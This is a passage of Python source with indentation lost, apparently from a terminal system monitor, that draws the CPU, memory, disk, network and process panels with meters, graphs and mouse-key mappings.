Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
if not cpu.cpu_temp[n]:
continue
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
bat_out: str = ""
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
battery_pos = cls.width - battery_len - 17
if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
elif cls.battery_clear:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.battery_clear = False
cls.battery_percent = 1000
cls.battery_secs = 0
cls.battery_status = "Unknown"
cls.old_battery_pos = 0
cls.old_battery_len = 0
cls.battery_path = ""
Draw.clear("battery", saved=True)
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
freq: str = f'{cpu.cpu_freq} MHz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_upper[-1])}'
if mid_line:
out += (f'{Mv.to(y+hh, x-1)}{THEME.cpu_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (w - bw - 3)}{THEME.div_line(Symbol.title_left)}'
f'{Mv.to(y+hh, x+((w-bw)//2)-((len(CONFIG.cpu_graph_upper)+len(CONFIG.cpu_graph_lower))//2)-4)}{THEME.main_fg}{CONFIG.cpu_graph_upper}{Mv.r(1)}▲▼{Mv.r(1)}{CONFIG.cpu_graph_lower}')
if not CONFIG.cpu_single_graph and Graphs.cpu.get("down"):
out += f'{Mv.to(y + hh + (1 * mid_line), x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_lower[-1])}'
out += (f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
try:
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{cpu.cpu_temp[0][-1]:>4}{THEME.main_fg}°C')
except:
cpu.got_sensors = False
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0 or ct_width > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
try:
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}'
out += f'{cpu.cpu_temp[n][-1]:>4}{THEME.main_fg}°C'
except:
cpu.got_sensors = False
elif cpu.got_sensors and not hide_cores:
out += f'{Mv.r(max(6, 6 * cls.column_size))}'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
if CONFIG.show_uptime:
out += f'{Mv.to(y + (0 if not CONFIG.cpu_invert_lower or CONFIG.cpu_single_graph else h - 1), x + 1)}{THEME.graph_text}{Fx.trans("up " + cpu.uptime)}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
num = 2
height_p = 38
width_p = 45
min_w: int = 36
min_h: int = 10
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
disks_io_h: int = 0
disks_io_order: List[str] = []
graph_speeds: Dict[str, int] = {}
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
if not "mem" in cls.boxes:
Box._b_mem_h = 0
cls.width = Term.width
return
width_p: int; height_p: int
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 60 if "net" in cls.boxes else 98
elif not "net" in cls.boxes:
height_p = 98 - CpuBox.height_p
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
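#* mem_size selects the layout detail level: 3 = label and meter on separate lines, 2 = single line with short labels, 1 = single line with one-letter labels and trimmed values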
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if not "mem" in cls.boxes: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("d")}{THEME.title("isks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
Key.mouse["d"] = [[cls.divider + 3 + i, cls.y] for i in range(5)]
else:
out += f'{Mv.to(cls.y, cls.x + cls.width - 9)}{THEME.mem_box(Symbol.title_left)}{THEME.hi_fg("d")}{THEME.title("isks")}{THEME.mem_box(Symbol.title_right)}'
Key.mouse["d"] = [[cls.x + cls.width - 8 + i, cls.y] for i in range(5)]
return out
@classmethod
def _draw_fg(cls):
if not "mem" in cls.boxes: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls.redraw = True
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.swap_disk and CONFIG.show_disks:
break
elif CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if CONFIG.show_disks and mem.disks:
if CONFIG.show_io_stat or CONFIG.io_mode:
d_graph: List[str] = []
d_no_graph: List[str] = []
l_vals: List[Tuple[str, int, str, bool]] = []
if CONFIG.io_mode:
cls.disks_io_h = (cls.height - 2 - len(mem.disks)) // max(1, len(mem.disks_io_dict))
if cls.disks_io_h < 2: cls.disks_io_h = 1 if CONFIG.io_graph_combined else 2
else:
cls.disks_io_h = 1
if CONFIG.io_graph_speeds and not cls.graph_speeds:
try:
cls.graph_speeds = { spds.split(":")[0] : int(spds.split(":")[1]) for spds in list(i.strip() for i in CONFIG.io_graph_speeds.split(","))}
except (KeyError, ValueError):
errlog.error("Wrong formatting in io_graph_speeds variable. Using defaults.")
for name in mem.disks.keys():
if name in mem.disks_io_dict:
d_graph.append(name)
else:
d_no_graph.append(name)
continue
if CONFIG.io_graph_combined or not CONFIG.io_mode:
l_vals = [("rw", cls.disks_io_h, "available", False)]
else:
l_vals = [("read", cls.disks_io_h // 2, "free", False), ("write", cls.disks_io_h // 2, "used", True)]
Graphs.disk_io[name] = {_name : Graph(width=cls.disks_width - (6 if not CONFIG.io_mode else 0), height=_height, color=THEME.gradient[_gradient],
data=mem.disks_io_dict[name][_name], invert=_invert, max_value=cls.graph_speeds.get(name, 10), no_zero=True)
for _name, _height, _gradient, _invert in l_vals}
cls.disks_io_order = d_graph + d_no_graph
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if not "i" in Key.mouse:
Key.mouse["i"] = [[x + w - 10 + i, y-1] for i in range(2)]
out_misc += (f'{Mv.to(y-1, x + w - 11)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.io_mode else ""}'
f'{THEME.hi_fg("i")}{THEME.title("o")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if Collector.collect_interrupt: return
Draw.buffer("mem_misc", out_misc, only_save=True)
try:
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = cls.mem_width > 21
for name in cls.mem_names:
if cy > h - 1: break
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if cy > h - 1: break
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks and mem.disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = cls.disks_width >= 25
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
if CONFIG.io_mode:
for name in cls.disks_io_order:
item = mem.disks[name]
io_item = mem.disks_io_dict.get(name, {})
if Collector.collect_interrupt: return
if cy > h - 1: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
if big_disk:
out += Fx.trans(f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(str(item["used_percent"])) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["used_percent"]}%')
cy += 1
if io_item:
if cy > h - 1: break
if CONFIG.io_graph_combined:
if cls.disks_io_h <= 1:
out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}'
out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io"] or "RW"}')
cy += cls.disks_io_h
else:
if cls.disks_io_h <= 3:
out += f'{Mv.to(y+cy, x+cx-1)}{" " * 5}{Mv.to(y+cy+1, x+cx-1)}{" " * 5}'
out += (f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{Graphs.disk_io[name]["read"](None if cls.redraw else mem.disks_io_dict[name]["read"][-1])}'
f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{item["io_r"] or "R"}')
cy += cls.disks_io_h // 2
out += f'{Mv.to(y+cy, x+cx-1)}{Graphs.disk_io[name]["write"](None if cls.redraw else mem.disks_io_dict[name]["write"][-1])}'
cy += cls.disks_io_h // 2
out += f'{Mv.to(y+cy-1, x+cx-1)}{THEME.main_fg}{item["io_w"] or "W"}'
else:
for name, item in mem.disks.items():
if Collector.collect_interrupt: return
if not name in Meters.disks_used:
continue
if cy > h - 1: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
if big_disk:
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{Fx.trans(item["io"])}'
cy += 1
if cy > h - 1: break
if CONFIG.show_io_stat and name in Graphs.disk_io:
out += f'{Mv.to(y+cy, x+cx-1)}{THEME.main_fg}{Fx.ub}{" IO: " if big_disk else " IO " + Mv.l(2)}{Fx.ub}{Graphs.disk_io[name]["rw"](None if cls.redraw else mem.disks_io_dict[name]["rw"][-1])}'
if not big_disk and item["io"]:
out += f'{Mv.to(y+cy, x+cx-1)}{Fx.ub}{THEME.main_fg}{item["io"]}'
cy += 1
if cy > h - 1: break
out += Mv.to(y+cy, x+cx) + (f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U ")
out += f'{Meters.disks_used[name](None if cls.resized else mem.disks[name]["used_percent"])}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 3 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name](None if cls.resized else mem.disks[name]["free_percent"])}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 + (len(mem.disks_io_dict) if CONFIG.show_io_stat else 0) <= h + 1: cy += 1
except (KeyError, TypeError):
return
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
num = 3
height_p = 30
width_p = 45
min_w: int = 36
min_h: int = 6
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "net" in cls.boxes:
cls.width = Term.width
return
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if not "net" in cls.boxes: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if not "net" in cls.boxes: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
if not "b" in Key.mouse:
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
if not "a" in Key.mouse: Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
if not "y" in Key.mouse: Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if net.address and w - len(net.nic[:10]) - len(net.address) - 20 > 15:
out_misc += (f'{Mv.to(y-1, x+7)}{THEME.net_box(Symbol.title_left)}{Fx.b}{THEME.title(net.address)}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
num = 4
height_p = 68
width_p = 55
min_w: int = 44
min_h: int = 16
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "proc" in cls.boxes:
cls.width = Term.width
return
width_p: int; height_p: int
if not "net" in cls.boxes and not "mem" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if not "proc" in cls.boxes: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
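#* Translate keyboard and mouse input into a new selection position and scroll offset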
if key in ["up", "k"]:
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key in ["down", "j"]:
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
